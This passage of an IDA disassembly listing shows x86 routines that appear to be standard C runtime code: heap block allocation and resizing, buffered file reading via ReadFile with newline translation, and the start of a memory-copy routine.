add eax, 1000h
dec ecx
jnz short loc_416DF0
mov edx, [ebp+var_4]
loc_416E28: ; CODE XREF: sub_416D74+6F�j
mov eax, [ebp+var_8]
add eax, 1F8h
lea ecx, [edi+0Ch]
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
xor edi, edi
inc edi
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_416E65
or [eax+4], edi
loc_416E65: ; CODE XREF: sub_416D74+EC�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_416E75: ; CODE XREF: sub_416D74+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_416D74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E7A proc near ; CODE XREF: sub_41318A+77�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov edx, edi
sub edx, [ecx+0Ch]
add esi, 17h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
and esi, 0FFFFFFF0h
dec ecx
cmp esi, ecx
lea edi, [ecx+edi-4]
mov ebx, [edi]
mov [ebp+arg_8], ecx
mov [ebp+var_4], ebx
jle loc_41701C
test bl, 1
jnz loc_417015
add ebx, ecx
cmp esi, ebx
jg loc_417015
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_416EEF
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_416EEF: ; CODE XREF: sub_416E7A+6D�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_416F3A
cmp ecx, 20h
mov ebx, 80000000h
jnb short loc_416F1B
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_416F3A
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_416F3A
; ---------------------------------------------------------------------------
loc_416F1B: ; CODE XREF: sub_416E7A+85�j
add ecx, 0FFFFFFE0h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_416F3A
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_416F3A: ; CODE XREF: sub_416E7A+7B�j
; sub_416E7A+98�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_417003
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
cmp edi, 3Fh
lea ecx, [ecx+esi-4]
jbe short loc_416F74
push 3Fh
pop edi
loc_416F74: ; CODE XREF: sub_416E7A+F5�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_416FF1
mov cl, [edi+eax+4]
mov byte ptr [ebp+arg_8+3], cl
inc cl
cmp edi, 20h
mov [edi+eax+4], cl
jnb short loc_416FC8
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_416FC0
mov ecx, edi
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_416FC0: ; CODE XREF: sub_416E7A+136�j
lea eax, [eax+edx*4+44h]
mov ecx, edi
jmp short loc_416FE8
; ---------------------------------------------------------------------------
loc_416FC8: ; CODE XREF: sub_416E7A+130�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_416FDE
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_416FDE: ; CODE XREF: sub_416E7A+152�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
loc_416FE8: ; CODE XREF: sub_416E7A+14C�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_416FF1: ; CODE XREF: sub_416E7A+11E�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_417006
; ---------------------------------------------------------------------------
loc_417003: ; CODE XREF: sub_416E7A+DE�j
mov edx, [ebp+arg_4]
loc_417006: ; CODE XREF: sub_416E7A+187�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_417151
; ---------------------------------------------------------------------------
loc_417015: ; CODE XREF: sub_416E7A+50�j
; sub_416E7A+5A�j
xor eax, eax
jmp loc_417154
; ---------------------------------------------------------------------------
loc_41701C: ; CODE XREF: sub_416E7A+47�j
jge loc_417151
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+arg_4], ebx
mov [ebx-4], ecx
jbe short loc_417047
push 3Fh
pop esi
loc_417047: ; CODE XREF: sub_416E7A+1C8�j
test byte ptr [ebp+var_4], 1
jnz loc_4170D1
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_417060
push 3Fh
pop esi
loc_417060: ; CODE XREF: sub_416E7A+1E1�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_4170AA
cmp esi, 20h
mov ebx, 80000000h
jnb short loc_41708B
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_4170A7
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_4170A7
; ---------------------------------------------------------------------------
loc_41708B: ; CODE XREF: sub_416E7A+1F6�j
lea ecx, [esi-20h]
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_4170A7
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_4170A7: ; CODE XREF: sub_416E7A+208�j
; sub_416E7A+20F�j ...
mov ebx, [ebp+arg_4]
loc_4170AA: ; CODE XREF: sub_416E7A+1EC�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov esi, [edi+8]
mov ecx, [edi+4]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_4170D1
push 3Fh
pop esi
loc_4170D1: ; CODE XREF: sub_416E7A+1D1�j
; sub_416E7A+252�j
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [ebx+8], ecx
mov [ebx+4], edi
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_417148
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jnb short loc_41711F
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_417117
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_417117: ; CODE XREF: sub_416E7A+28D�j
lea eax, [eax+edx*4+44h]
mov ecx, esi
jmp short loc_41713F
; ---------------------------------------------------------------------------
loc_41711F: ; CODE XREF: sub_416E7A+287�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_417135
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_417135: ; CODE XREF: sub_416E7A+2A9�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
loc_41713F: ; CODE XREF: sub_416E7A+2A3�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_417148: ; CODE XREF: sub_416E7A+275�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_417151: ; CODE XREF: sub_416E7A+196�j
; sub_416E7A:loc_41701C�j
xor eax, eax
inc eax
loc_417154: ; CODE XREF: sub_416E7A+19D�j
pop edi
pop esi
pop ebx
leave
retn
sub_416E7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417159 proc near ; CODE XREF: sub_41318A+89�p
; sub_4133A6+2D�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov ecx, [ebp+arg_0]
mov eax, dword_47A624
mov edx, dword_47A628
add ecx, 17h
and ecx, 0FFFFFFF0h
push ebx
mov [ebp+var_10], ecx
sar ecx, 4
push esi
lea eax, [eax+eax*4]
push edi
dec ecx
cmp ecx, 20h
lea edi, [edx+eax*4]
mov [ebp+var_4], edi
jge short loc_417196
or esi, 0FFFFFFFFh
shr esi, cl
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_4171A3
; ---------------------------------------------------------------------------
loc_417196: ; CODE XREF: sub_417159+30�j
add ecx, 0FFFFFFE0h
or eax, 0FFFFFFFFh
xor esi, esi
shr eax, cl
mov [ebp+var_8], eax
loc_4171A3: ; CODE XREF: sub_417159+3B�j
mov eax, dword_47A630
mov ebx, eax
mov [ebp+var_C], esi
cmp ebx, edi
jmp short loc_4171C5
; ---------------------------------------------------------------------------
loc_4171B1: ; CODE XREF: sub_417159+6F�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4171CA
add ebx, 14h
cmp ebx, [ebp+var_4]
loc_4171C5: ; CODE XREF: sub_417159+56�j
mov [ebp+arg_0], ebx
jb short loc_4171B1
loc_4171CA: ; CODE XREF: sub_417159+64�j
cmp ebx, [ebp+var_4]
jnz short loc_4171F3
mov ebx, edx
jmp short loc_4171E4
; ---------------------------------------------------------------------------
loc_4171D3: ; CODE XREF: sub_417159+90�j
mov ecx, [ebx+4]
mov edi, [ebx]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_4171EB
add ebx, 14h
loc_4171E4: ; CODE XREF: sub_417159+78�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_4171D3
loc_4171EB: ; CODE XREF: sub_417159+86�j
cmp ebx, eax
jz loc_417287
loc_4171F3: ; CODE XREF: sub_417159+74�j
; sub_417159+170�j
mov dword_47A630, ebx
mov eax, [ebx+10h]
mov edx, [eax]
cmp edx, 0FFFFFFFFh
mov [ebp+var_4], edx
jz short loc_41721A
mov ecx, [eax+edx*4+0C4h]
mov edi, [eax+edx*4+44h]
and ecx, [ebp+var_8]
and edi, esi
or ecx, edi
jnz short loc_417250
loc_41721A: ; CODE XREF: sub_417159+AB�j
mov edx, [eax+0C4h]
and edx, [ebp+var_8]
and [ebp+var_4], 0
lea ecx, [eax+44h]
mov esi, [ecx]
and esi, [ebp+var_C]
or edx, esi
mov esi, [ebp+var_C]
jnz short loc_41724D
loc_417236: ; CODE XREF: sub_417159+F2�j
mov edx, [ecx+84h]
and edx, [ebp+var_8]
inc [ebp+var_4]
add ecx, 4
mov edi, [ecx]
and edi, esi
or edx, edi
jz short loc_417236
loc_41724D: ; CODE XREF: sub_417159+DB�j
mov edx, [ebp+var_4]
loc_417250: ; CODE XREF: sub_417159+BF�j
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [eax+edx*4+44h]
xor edi, edi
and ecx, esi
jnz short loc_4172D9
mov ecx, [eax+edx*4+0C4h]
and ecx, [ebp+var_8]
push 20h
pop edi
jmp short loc_4172D9
; ---------------------------------------------------------------------------
loc_41727B: ; CODE XREF: sub_417159+131�j
cmp dword ptr [ebx+8], 0
jnz short loc_41728C
add ebx, 14h
mov [ebp+arg_0], ebx
loc_417287: ; CODE XREF: sub_417159+94�j
cmp ebx, [ebp+var_4]
jb short loc_41727B
loc_41728C: ; CODE XREF: sub_417159+126�j
cmp ebx, [ebp+var_4]
jnz short loc_4172B7
mov ebx, edx
jmp short loc_41729E
; ---------------------------------------------------------------------------
loc_417295: ; CODE XREF: sub_417159+14A�j
cmp dword ptr [ebx+8], 0
jnz short loc_4172A5
add ebx, 14h
loc_41729E: ; CODE XREF: sub_417159+13A�j
cmp ebx, eax
mov [ebp+arg_0], ebx
jb short loc_417295
loc_4172A5: ; CODE XREF: sub_417159+140�j
cmp ebx, eax
jnz short loc_4172B7
call sub_416CBD
mov ebx, eax
test ebx, ebx
mov [ebp+arg_0], ebx
jz short loc_4172CF
loc_4172B7: ; CODE XREF: sub_417159+136�j
; sub_417159+14E�j
push ebx
call sub_416D74
pop ecx
mov ecx, [ebx+10h]
mov [ecx], eax
mov eax, [ebx+10h]
cmp dword ptr [eax], 0FFFFFFFFh
jnz loc_4171F3
loc_4172CF: ; CODE XREF: sub_417159+15C�j
xor eax, eax
jmp loc_417450
; ---------------------------------------------------------------------------
loc_4172D6: ; CODE XREF: sub_417159+182�j
shl ecx, 1
inc edi
loc_4172D9: ; CODE XREF: sub_417159+111�j
; sub_417159+120�j
test ecx, ecx
jge short loc_4172D6
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+var_8], ecx
jle short loc_4172FA
push 3Fh
pop esi
loc_4172FA: ; CODE XREF: sub_417159+19C�j
cmp esi, edi
jz loc_417403
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_417366
cmp edi, 20h
mov ebx, 80000000h
jge short loc_41733A
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_417363
mov ecx, [ebp+var_14]
mov ebx, [ebp+arg_0]
and [ebx], ecx
jmp short loc_417366
; ---------------------------------------------------------------------------
loc_41733A: ; CODE XREF: sub_417159+1B9�j
lea ecx, [edi-20h]
shr ebx, cl
mov ecx, [ebp+var_4]
lea ecx, [eax+ecx*4+0C4h]
lea edi, [eax+edi+4]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_417363
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_417366
; ---------------------------------------------------------------------------
loc_417363: ; CODE XREF: sub_417159+1D5�j
; sub_417159+1FD�j
mov ebx, [ebp+arg_0]
loc_417366: ; CODE XREF: sub_417159+1AF�j
; sub_417159+1DF�j ...
cmp [ebp+var_8], 0
mov ecx, [edx+8]
mov edi, [edx+4]
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_41740F
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [edx+8], ecx
mov [edx+4], edi
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_417400
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_0+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jge short loc_4173D7
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_4173C5
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_4173C5: ; CODE XREF: sub_417159+25F�j
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_417400
; ---------------------------------------------------------------------------
loc_4173D7: ; CODE XREF: sub_417159+259�j
cmp byte ptr [ebp+arg_0+3], 0
jnz short loc_4173EA
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_4173EA: ; CODE XREF: sub_417159+282�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_417400: ; CODE XREF: sub_417159+247�j
; sub_417159+27C�j
mov ecx, [ebp+var_8]
loc_417403: ; CODE XREF: sub_417159+1A3�j
test ecx, ecx
jz short loc_417412
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_417412
; ---------------------------------------------------------------------------
loc_41740F: ; CODE XREF: sub_417159+223�j
mov ecx, [ebp+var_8]
loc_417412: ; CODE XREF: sub_417159+2AC�j
; sub_417159+2B4�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_417448
cmp ebx, dword_47A620
jnz short loc_417448
mov ecx, [ebp+var_4]
cmp ecx, dword_47A638
jnz short loc_417448
and dword_47A620, 0
loc_417448: ; CODE XREF: sub_417159+2D3�j
; sub_417159+2DB�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_417450: ; CODE XREF: sub_417159+178�j
pop edi
pop esi
pop ebx
leave
retn
sub_417159 endp
; =============== S U B R O U T I N E =======================================
sub_417455 proc near ; CODE XREF: sub_413055+AA�p
; sub_4142F5+44�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz loc_417531
test al, 40h
jnz loc_417531
test al, 2
jz short loc_41747C
or eax, 20h
mov [esi+0Ch], eax
jmp loc_417531
; ---------------------------------------------------------------------------
loc_41747C: ; CODE XREF: sub_417455+1A�j
or eax, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_417491
push esi
call sub_41AA0C
pop ecx
jmp short loc_417496
; ---------------------------------------------------------------------------
loc_417491: ; CODE XREF: sub_417455+31�j
mov eax, [esi+8]
mov [esi], eax
loc_417496: ; CODE XREF: sub_417455+3A�j
push dword ptr [esi+18h]
push dword ptr [esi+8]
push dword ptr [esi+10h]
call sub_417703
add esp, 0Ch
test eax, eax
mov [esi+4], eax
jz short loc_417520
cmp eax, 0FFFFFFFFh
jz short loc_417520
mov edx, [esi+0Ch]
test dl, 82h
jnz short loc_4174F5
mov ecx, [esi+10h]
cmp ecx, 0FFFFFFFFh
push edi
jz short loc_4174DB
mov edi, ecx
sar edi, 5
mov edi, dword_47A2E0[edi*4]
and ecx, 1Fh
lea ecx, [ecx+ecx*8]
lea edi, [edi+ecx*4]
jmp short loc_4174E0
; ---------------------------------------------------------------------------
loc_4174DB: ; CODE XREF: sub_417455+6D�j
mov edi, offset dword_42D068
loc_4174E0: ; CODE XREF: sub_417455+84�j
mov cl, [edi+4]
and cl, 82h
cmp cl, 82h
pop edi
jnz short loc_4174F5
or edx, 2000h
mov [esi+0Ch], edx
loc_4174F5: ; CODE XREF: sub_417455+64�j
; sub_417455+95�j
cmp dword ptr [esi+18h], 200h
jnz short loc_417512
mov ecx, [esi+0Ch]
test cl, 8
jz short loc_417512
test ch, 4
jnz short loc_417512
mov dword ptr [esi+18h], 1000h
loc_417512: ; CODE XREF: sub_417455+A7�j
; sub_417455+AF�j ...
mov ecx, [esi]
dec eax
mov [esi+4], eax
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_417520: ; CODE XREF: sub_417455+57�j
; sub_417455+5C�j
neg eax
sbb eax, eax
and eax, 10h
add eax, 10h
or [esi+0Ch], eax
and dword ptr [esi+4], 0
loc_417531: ; CODE XREF: sub_417455+A�j
; sub_417455+12�j ...
or eax, 0FFFFFFFFh
pop esi
retn
sub_417455 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417536 proc near ; CODE XREF: sub_417703+52�p
; sub_41BFAD+2A7�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_8], 0
cmp [ebp+arg_8], 0
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
mov edx, ebx
jz loc_4176FC
mov eax, [ebp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
lea esi, [eax+eax*8]
lea edi, ds:47A2E0h[ecx*4]
mov eax, [edi]
shl esi, 2
add eax, esi
mov cl, [eax+4]
test cl, 2
jnz loc_4176FC
test cl, 48h
jz short loc_41759C
mov al, [eax+5]
cmp al, 0Ah
jz short loc_41759C
dec [ebp+arg_8]
mov [ebx], al
mov eax, [edi]
lea edx, [ebx+1]
mov [ebp+var_8], 1
mov byte ptr [eax+esi+5], 0Ah
loc_41759C: ; CODE XREF: sub_417536+47�j
; sub_417536+4E�j
push 0
lea eax, [ebp+var_C]
push eax
push [ebp+arg_8]
mov eax, [edi]
push edx
push dword ptr [eax+esi]
call ds:dword_41F058 ; ReadFile
test eax, eax
jnz short loc_4175EE
call ds:dword_41F008 ; RtlGetLastWin32Error
push 5
pop esi
cmp eax, esi
jnz short loc_4175D6
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
mov [eax], esi
jmp short loc_4175E6
; ---------------------------------------------------------------------------
loc_4175D6: ; CODE XREF: sub_417536+8A�j
cmp eax, 6Dh
jz loc_4176FC
push eax
call sub_417C82
pop ecx
loc_4175E6: ; CODE XREF: sub_417536+9E�j
or eax, 0FFFFFFFFh
jmp loc_4176FE
; ---------------------------------------------------------------------------
loc_4175EE: ; CODE XREF: sub_417536+7D�j
mov eax, [edi]
mov edx, [ebp+var_C]
add [ebp+var_8], edx
lea ecx, [eax+esi+4]
mov al, [ecx]
test al, al
jns loc_4176F7
test edx, edx
jz short loc_417611
cmp byte ptr [ebx], 0Ah
jnz short loc_417611
or al, 4
jmp short loc_417613
; ---------------------------------------------------------------------------
loc_417611: ; CODE XREF: sub_417536+D0�j
; sub_417536+D5�j
and al, 0FBh
loc_417613: ; CODE XREF: sub_417536+D9�j
mov [ecx], al
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_8]
add ecx, eax
cmp eax, ecx
mov [ebp+arg_8], eax
mov [ebp+var_8], ecx
jnb loc_4176F1
loc_41762B: ; CODE XREF: sub_417536+1A3�j
mov eax, [ebp+arg_8]
mov al, [eax]
cmp al, 1Ah
jz loc_4176E1
cmp al, 0Dh
jz short loc_417647
mov [ebx], al
inc ebx
inc [ebp+arg_8]
jmp loc_4176D3
; ---------------------------------------------------------------------------
loc_417647: ; CODE XREF: sub_417536+104�j
dec ecx
cmp [ebp+arg_8], ecx
jnb short loc_417661
mov eax, [ebp+arg_8]
inc eax
cmp byte ptr [eax], 0Ah
jnz short loc_41765C
add [ebp+arg_8], 2
jmp short loc_4176B5
; ---------------------------------------------------------------------------
loc_41765C: ; CODE XREF: sub_417536+11E�j
mov [ebp+arg_8], eax
jmp short loc_4176CF
; ---------------------------------------------------------------------------
loc_417661: ; CODE XREF: sub_417536+115�j
inc [ebp+arg_8]
push 0
lea eax, [ebp+var_C]
push eax
push 1
lea eax, [ebp+var_1]
push eax
mov eax, [edi]
push dword ptr [eax+esi]
call ds:dword_41F058 ; ReadFile
test eax, eax
jnz short loc_417689
call ds:dword_41F008 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_4176CF
loc_417689: ; CODE XREF: sub_417536+147�j
cmp [ebp+var_C], 0
jz short loc_4176CF
mov eax, [edi]
test byte ptr [eax+esi+4], 48h
jz short loc_4176AA
mov al, [ebp+var_1]
cmp al, 0Ah
jz short loc_4176B5
mov byte ptr [ebx], 0Dh
mov ecx, [edi]
mov [ecx+esi+5], al
jmp short loc_4176D2
; ---------------------------------------------------------------------------
loc_4176AA: ; CODE XREF: sub_417536+160�j
cmp ebx, [ebp+arg_4]
jnz short loc_4176BA
cmp [ebp+var_1], 0Ah
jnz short loc_4176BA
loc_4176B5: ; CODE XREF: sub_417536+124�j
; sub_417536+167�j
mov byte ptr [ebx], 0Ah
jmp short loc_4176D2
; ---------------------------------------------------------------------------
loc_4176BA: ; CODE XREF: sub_417536+177�j
; sub_417536+17D�j
push 1
push 0FFFFFFFFh
push [ebp+arg_0]
call sub_419BC9
add esp, 0Ch
cmp [ebp+var_1], 0Ah
jz short loc_4176D3
loc_4176CF: ; CODE XREF: sub_417536+129�j
; sub_417536+151�j ...
mov byte ptr [ebx], 0Dh
loc_4176D2: ; CODE XREF: sub_417536+172�j
; sub_417536+182�j
inc ebx
loc_4176D3: ; CODE XREF: sub_417536+10C�j
; sub_417536+197�j
mov ecx, [ebp+var_8]
cmp [ebp+arg_8], ecx
jb loc_41762B
jmp short loc_4176F1
; ---------------------------------------------------------------------------
loc_4176E1: ; CODE XREF: sub_417536+FC�j
mov eax, [edi]
lea esi, [eax+esi+4]
mov al, [esi]
test al, 40h
jnz short loc_4176F1
or al, 2
mov [esi], al
loc_4176F1: ; CODE XREF: sub_417536+EF�j
; sub_417536+1A9�j ...
sub ebx, [ebp+arg_4]
mov [ebp+var_8], ebx
loc_4176F7: ; CODE XREF: sub_417536+C8�j
mov eax, [ebp+var_8]
jmp short loc_4176FE
; ---------------------------------------------------------------------------
loc_4176FC: ; CODE XREF: sub_417536+16�j
; sub_417536+3E�j ...
xor eax, eax
loc_4176FE: ; CODE XREF: sub_417536+B3�j
; sub_417536+1C4�j
pop edi
pop esi
pop ebx
leave
retn
sub_417536 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_417703 proc near ; CODE XREF: sub_413055+91�p
; sub_417455+4A�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 00417792 SIZE 0000001C BYTES
push 0Ch
push offset stru_427A40
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47A2C8
jnb short loc_417792
mov eax, ebx
sar eax, 5
lea edi, ds:47A2E0h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_417792
push ebx
call sub_41B7AC
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_417762
push [ebp+arg_8]
push [ebp+arg_4]
push ebx
call sub_417536
add esp, 0Ch
mov [ebp+var_1C], eax
jmp short loc_417779
; ---------------------------------------------------------------------------
loc_417762: ; CODE XREF: sub_417703+49�j
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
and dword ptr [eax], 0
or [ebp+var_1C], 0FFFFFFFFh
loc_417779: ; CODE XREF: sub_417703+5D�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41778A
mov eax, [ebp+var_1C]
jmp short loc_4177A8
sub_417703 endp
; =============== S U B R O U T I N E =======================================
sub_417787 proc near ; DATA XREF: .rdata:stru_427A40�o
mov ebx, [ebp+8]
sub_417787 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41778A proc near ; CODE XREF: sub_417703+7A�p
push ebx
call sub_41B81F
pop ecx
retn
sub_41778A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_417703
loc_417792: ; CODE XREF: sub_417703+15�j
; sub_417703+35�j
call sub_417C70
mov dword ptr [eax], 9
call sub_417C79
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_4177A8: ; CODE XREF: sub_417703+82�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_417703
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4177B0 proc near ; CODE XREF: sub_413055+5F�p
; sub_41318A+A8�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4177D0
cmp edi, eax
jb loc_41794C
loc_4177D0: ; CODE XREF: sub_4177B0+16�j
test edi, 3
jnz short loc_4177EC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41780C
rep movsd
jmp ds:off_4178FC[edx*4]
; ---------------------------------------------------------------------------
loc_4177EC: ; CODE XREF: sub_4177B0+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_417804
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_41780C+4[eax*4]
